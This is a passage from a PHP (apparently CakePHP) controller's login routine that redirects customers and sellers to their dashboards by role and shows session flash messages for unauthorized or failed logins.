						$userinfo=$userdata['User'];
						$this->Session->write('Auth.User',$userinfo);
						$this->Session->setFlash(__('You have logged in successfully.'), 'default', array('class' => 'success'));
						$this->redirect(array('controller'=>'customers','action'=>'dashboard'));
					}
					else if($this->Auth->User('role')=='3')
					{
						$userdata=$this->User->find("first",array("conditions"=>array("User.id"=>$this->Auth->user('id'))));
						$userinfo=$userdata['User'];
						$this->Session->write('Auth.User',$userinfo);
						$this->Session->setFlash(__('You have logged in successfully.'), 'default', array('class' => 'success'));
						$this->redirect(array('controller'=>'sellers','action'=>'dashboard'));
					}
					else
					{
						$this->Session->setFlash(__('You are not authorized to access this page.'), 'default', array('class' => 'error'));
						$this->redirect($this->Auth->logout($url));						
					}
				} else {
					$this->Session->setFlash(__('Invalid username or password, try again.'), 'default', array('class' => 'error'));
						$this->redirect($url);
				}
			}
		}
	}
}
